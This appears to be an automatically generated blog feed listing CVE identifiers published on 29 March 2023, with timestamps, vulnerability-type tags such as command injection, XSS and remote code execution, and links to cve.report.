2023-03-29 07:00:02.233374 (Remote Code Execution, AWS) CVE-2023-28637 https://cve.report/CVE-2023-28637
2023-03-29 07:00:02.234587 (PHP) CVE-2023-28447 https://cve.report/CVE-2023-28447
2023-03-29 07:00:02.235980 (Command Injection, PHP) CVE-2023-27886 https://cve.report/CVE-2023-27886
2023-03-29 07:00:02.236867 (Command Injection, PHP) CVE-2023-27394 https://cve.report/CVE-2023-27394
2023-03-29 07:00:02.238040 (Critical) CVE-2023-1676 https://cve.report/CVE-2023-1676
2023-03-29 07:00:02.239005 (Critical) CVE-2023-1516 https://cve.report/CVE-2023-1516
2023-03-29 08:00:02.667205 (Command Injection) CVE-2023-27231 https://cve.report/CVE-2023-27231
2023-03-29 08:00:02.668152 (Command Injection) CVE-2023-27229 https://cve.report/CVE-2023-27229
2023-03-29 08:00:02.669067 (Critical) CVE-2023-1679 https://cve.report/CVE-2023-1679
2023-03-29 08:00:02.669972 (Critical) CVE-2023-1678 https://cve.report/CVE-2023-1678
2023-03-29 08:00:02.671054 (Remote Attack) CVE-2022-45460 https://cve.report/CVE-2022-45460
2023-03-29 09:00:02.860635 (Command Injection) CVE-2023-27232 https://cve.report/CVE-2023-27232
2023-03-29 09:00:02.861517 (PHP) CVE-2023-1681 https://cve.report/CVE-2023-1681
2023-03-29 10:00:02.341043 (Execute Arbitrary code) CVE-2023-24304 https://cve.report/CVE-2023-24304
2023-03-29 10:00:02.350591 (Execute Arbitrary code) CVE-2022-24973 https://cve.report/CVE-2022-24973
2023-03-29 14:00:02.760074 (PHP, File Upload) CVE-2023-1684 https://cve.report/CVE-2023-1684
2023-03-29 15:00:02.061911 (Arbitrary Command) CVE-2023-23355 https://cve.report/CVE-2023-23355
2023-03-29 16:00:02.265524 (Command Injection, PHP, Critical) CVE-2023-1685 https://cve.report/CVE-2023-1685
2023-03-29 21:00:02.057126 (Remote Code Execution, WordPress) CVE-2023-1509 https://cve.report/CVE-2023-1509
2023-03-29 23:00:02.377249 (XSS, File Upload) CVE-2023-28158 https://cve.report/CVE-2023-28158
2023-03-29 23:00:02.378212 (XSS) CVE-2022-47444 https://cve.report/CVE-2022-47444
2023-03-29 23:00:02.379287 (XSS) CVE-2022-47438 https://cve.report/CVE-2022-47438
반응형

+ Recent posts